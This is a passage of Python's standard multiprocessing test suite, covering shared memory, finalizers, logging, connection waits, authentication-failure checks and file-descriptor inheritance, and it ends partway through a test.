y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
@unittest.skipUnless(HAS_SHMEM, "requires multiprocessing.shared_memory")
@hashlib_helper.requires_hashdigest('md5')
class _TestSharedMemory(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@staticmethod
def _attach_existing_shmem_then_write(shmem_name_or_obj, binary_data):
if isinstance(shmem_name_or_obj, str):
local_sms = shared_memory.SharedMemory(shmem_name_or_obj)
else:
local_sms = shmem_name_or_obj
local_sms.buf[:len(binary_data)] = binary_data
local_sms.close()
def test_shared_memory_basics(self):
sms = shared_memory.SharedMemory('test01_tsmb', create=True, size=512)
self.addCleanup(sms.unlink)
# Verify attributes are readable.
self.assertEqual(sms.name, 'test01_tsmb')
self.assertGreaterEqual(sms.size, 512)
self.assertGreaterEqual(len(sms.buf), sms.size)
# Modify contents of shared memory segment through memoryview.
sms.buf[0] = 42
self.assertEqual(sms.buf[0], 42)
# Attach to existing shared memory segment.
also_sms = shared_memory.SharedMemory('test01_tsmb')
self.assertEqual(also_sms.buf[0], 42)
also_sms.close()
# Attach to existing shared memory segment but specify a new size.
same_sms = shared_memory.SharedMemory('test01_tsmb', size=20*sms.size)
self.assertLess(same_sms.size, 20*sms.size) # Size was ignored.
same_sms.close()
# Creating Shared Memory Segment with -ve size
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=True, size=-2)
# Attaching Shared Memory Segment without a name
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=False)
# Test if shared memory segment is created properly,
# when _make_filename returns an existing shared memory segment name
with unittest.mock.patch(
'multiprocessing.shared_memory._make_filename') as mock_make_filename:
NAME_PREFIX = shared_memory._SHM_NAME_PREFIX
names = ['test01_fn', 'test02_fn']
# Prepend NAME_PREFIX which can be '/psm_' or 'wnsm_', necessary
# because some POSIX compliant systems require name to start with /
names = [NAME_PREFIX + name for name in names]
mock_make_filename.side_effect = names
shm1 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm1.unlink)
self.assertEqual(shm1._name, names[0])
mock_make_filename.side_effect = names
shm2 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm2.unlink)
self.assertEqual(shm2._name, names[1])
if shared_memory._USE_POSIX:
# Posix Shared Memory can only be unlinked once. Here we
# test an implementation detail that is not observed across
# all supported platforms (since WindowsNamedSharedMemory
# manages unlinking on its own and unlink() does nothing).
# True release of shared memory segment does not necessarily
# happen until process exits, depending on the OS platform.
with self.assertRaises(FileNotFoundError):
sms_uno = shared_memory.SharedMemory(
'test01_dblunlink',
create=True,
size=5000
)
try:
self.assertGreaterEqual(sms_uno.size, 5000)
sms_duo = shared_memory.SharedMemory('test01_dblunlink')
sms_duo.unlink() # First shm_unlink() call.
sms_duo.close()
sms_uno.close()
finally:
sms_uno.unlink() # A second shm_unlink() call is bad.
with self.assertRaises(FileExistsError):
# Attempting to create a new shared memory segment with a
# name that is already in use triggers an exception.
there_can_only_be_one_sms = shared_memory.SharedMemory(
'test01_tsmb',
create=True,
size=512
)
if shared_memory._USE_POSIX:
# Requesting creation of a shared memory segment with the option
# to attach to an existing segment, if that name is currently in
# use, should not trigger an exception.
# Note: Using a smaller size could possibly cause truncation of
# the existing segment but is OS platform dependent. In the
# case of MacOS/darwin, requesting a smaller size is disallowed.
class OptionalAttachSharedMemory(shared_memory.SharedMemory):
_flags = os.O_CREAT | os.O_RDWR
ok_if_exists_sms = OptionalAttachSharedMemory('test01_tsmb')
self.assertEqual(ok_if_exists_sms.size, sms.size)
ok_if_exists_sms.close()
# Attempting to attach to an existing shared memory segment when
# no segment exists with the supplied name triggers an exception.
with self.assertRaises(FileNotFoundError):
nonexisting_sms = shared_memory.SharedMemory('test01_notthere')
nonexisting_sms.unlink() # Error should occur on prior line.
sms.close()
def test_shared_memory_across_processes(self):
# bpo-40135: don't define shared memory block's name in case of
# the failure when we run multiprocessing tests in parallel.
sms = shared_memory.SharedMemory(create=True, size=512)
self.addCleanup(sms.unlink)
# Verify remote attachment to existing block by name is working.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms.name, b'howdy')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'howdy')
# Verify pickling of SharedMemory instance also works.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms, b'HELLO')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'HELLO')
sms.close()
@unittest.skipIf(os.name != "posix", "not feasible in non-posix platforms")
def test_shared_memory_SharedMemoryServer_ignores_sigint(self):
# bpo-36368: protect SharedMemoryManager server process from
# KeyboardInterrupt signals.
smm = multiprocessing.managers.SharedMemoryManager()
smm.start()
# make sure the manager works properly at the beginning
sl = smm.ShareableList(range(10))
# the manager's server should ignore KeyboardInterrupt signals, and
# maintain its connection with the current process, and success when
# asked to deliver memory segments.
os.kill(smm._process.pid, signal.SIGINT)
sl2 = smm.ShareableList(range(10))
# test that the custom signal handler registered in the Manager does
# not affect signal handling in the parent process.
with self.assertRaises(KeyboardInterrupt):
os.kill(os.getpid(), signal.SIGINT)
smm.shutdown()
@unittest.skipIf(os.name != "posix", "resource_tracker is posix only")
def test_shared_memory_SharedMemoryManager_reuses_resource_tracker(self):
# bpo-36867: test that a SharedMemoryManager uses the
# same resource_tracker process as its parent.
cmd = '''if 1:
from multiprocessing.managers import SharedMemoryManager
smm = SharedMemoryManager()
smm.start()
sl = smm.ShareableList(range(10))
smm.shutdown()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
# Before bpo-36867 was fixed, a SharedMemoryManager not using the same
# resource_tracker process as its parent would make the parent's
# tracker complain about sl being leaked even though smm.shutdown()
# properly released sl.
self.assertFalse(err)
def test_shared_memory_SharedMemoryManager_basics(self):
smm1 = multiprocessing.managers.SharedMemoryManager()
with self.assertRaises(ValueError):
smm1.SharedMemory(size=9) # Fails if SharedMemoryServer not started
smm1.start()
lol = [ smm1.ShareableList(range(i)) for i in range(5, 10) ]
lom = [ smm1.SharedMemory(size=j) for j in range(32, 128, 16) ]
doppleganger_list0 = shared_memory.ShareableList(name=lol[0].shm.name)
self.assertEqual(len(doppleganger_list0), 5)
doppleganger_shm0 = shared_memory.SharedMemory(name=lom[0].name)
self.assertGreaterEqual(len(doppleganger_shm0.buf), 32)
held_name = lom[0].name
smm1.shutdown()
if sys.platform != "win32":
# Calls to unlink() have no effect on Windows platform; shared
# memory will only be released once final process exits.
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_shm = shared_memory.SharedMemory(name=held_name)
with multiprocessing.managers.SharedMemoryManager() as smm2:
sl = smm2.ShareableList("howdy")
shm = smm2.SharedMemory(size=128)
held_name = sl.shm.name
if sys.platform != "win32":
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_sl = shared_memory.ShareableList(name=held_name)
def test_shared_memory_ShareableList_basics(self):
sl = shared_memory.ShareableList(
['howdy', b'HoWdY', -273.154, 100, None, True, 42]
)
self.addCleanup(sl.shm.unlink)
# Verify attributes are readable.
self.assertEqual(sl.format, '8s8sdqxxxxxx?xxxxxxxx?q')
# Exercise len().
self.assertEqual(len(sl), 7)
# Exercise index().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
with self.assertRaises(ValueError):
sl.index('100')
self.assertEqual(sl.index(100), 3)
# Exercise retrieving individual values.
self.assertEqual(sl[0], 'howdy')
self.assertEqual(sl[-2], True)
# Exercise iterability.
self.assertEqual(
tuple(sl),
('howdy', b'HoWdY', -273.154, 100, None, True, 42)
)
# Exercise modifying individual values.
sl[3] = 42
self.assertEqual(sl[3], 42)
sl[4] = 'some' # Change type at a given position.
self.assertEqual(sl[4], 'some')
self.assertEqual(sl.format, '8s8sdq8sxxxxxxx?q')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[4] = 'far too many'
self.assertEqual(sl[4], 'some')
sl[0] = 'encodés' # Exactly 8 bytes of UTF-8 data
self.assertEqual(sl[0], 'encodés')
self.assertEqual(sl[1], b'HoWdY') # no spillage
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[0] = 'encodées' # Exactly 9 bytes of UTF-8 data
self.assertEqual(sl[1], b'HoWdY')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[1] = b'123456789'
self.assertEqual(sl[1], b'HoWdY')
# Exercise count().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
self.assertEqual(sl.count(42), 2)
self.assertEqual(sl.count(b'HoWdY'), 1)
self.assertEqual(sl.count(b'adios'), 0)
# Exercise creating a duplicate.
sl_copy = shared_memory.ShareableList(sl, name='test03_duplicate')
try:
self.assertNotEqual(sl.shm.name, sl_copy.shm.name)
self.assertEqual('test03_duplicate', sl_copy.shm.name)
self.assertEqual(list(sl), list(sl_copy))
self.assertEqual(sl.format, sl_copy.format)
sl_copy[-1] = 77
self.assertEqual(sl_copy[-1], 77)
self.assertNotEqual(sl[-1], 77)
sl_copy.shm.close()
finally:
sl_copy.shm.unlink()
# Obtain a second handle on the same ShareableList.
sl_tethered = shared_memory.ShareableList(name=sl.shm.name)
self.assertEqual(sl.shm.name, sl_tethered.shm.name)
sl_tethered[-1] = 880
self.assertEqual(sl[-1], 880)
sl_tethered.shm.close()
sl.shm.close()
# Exercise creating an empty ShareableList.
empty_sl = shared_memory.ShareableList()
try:
self.assertEqual(len(empty_sl), 0)
self.assertEqual(empty_sl.format, '')
self.assertEqual(empty_sl.count('any'), 0)
with self.assertRaises(ValueError):
empty_sl.index(None)
empty_sl.shm.close()
finally:
empty_sl.shm.unlink()
def test_shared_memory_ShareableList_pickling(self):
sl = shared_memory.ShareableList(range(10))
self.addCleanup(sl.shm.unlink)
serialized_sl = pickle.dumps(sl)
deserialized_sl = pickle.loads(serialized_sl)
self.assertTrue(
isinstance(deserialized_sl, shared_memory.ShareableList)
)
self.assertTrue(deserialized_sl[-1], 9)
self.assertFalse(sl is deserialized_sl)
deserialized_sl[4] = "changed"
self.assertEqual(sl[4], "changed")
# Verify data is not being put into the pickled representation.
name = 'a' * len(sl.shm.name)
larger_sl = shared_memory.ShareableList(range(400))
self.addCleanup(larger_sl.shm.unlink)
serialized_larger_sl = pickle.dumps(larger_sl)
self.assertTrue(len(serialized_sl) == len(serialized_larger_sl))
larger_sl.shm.close()
deserialized_sl.shm.close()
sl.shm.close()
def test_shared_memory_cleaned_after_process_termination(self):
cmd = '''if 1:
import os, time, sys
from multiprocessing import shared_memory
# Create a shared_memory segment, and send the segment name
sm = shared_memory.SharedMemory(create=True, size=10)
sys.stdout.write(sm.name + '\\n')
sys.stdout.flush()
time.sleep(100)
'''
with subprocess.Popen([sys.executable, '-E', '-c', cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
name = p.stdout.readline().strip().decode()
# killing abruptly processes holding reference to a shared memory
# segment should not leak the given memory segment.
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
t = 0.1
while time.monotonic() < deadline:
time.sleep(t)
t = min(t*2, 5)
try:
smm = shared_memory.SharedMemory(name, create=False)
except FileNotFoundError:
break
else:
raise AssertionError("A SharedMemory segment was leaked after"
" a process was abruptly terminated.")
if os.name == 'posix':
# A warning was emitted by the subprocess' own
# resource_tracker (on Windows, shared memory segments
# are released automatically by the OS).
err = p.stderr.read().decode()
self.assertIn(
"resource_tracker: There appear to be 1 leaked "
"shared_memory objects to clean up at shutdown", err)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with threading_helper.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
@hashlib_helper.requires_hashdigest('md5')
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
@hashlib_helper.requires_hashdigest('md5')
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.create_server((socket_helper.HOST, 0))
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
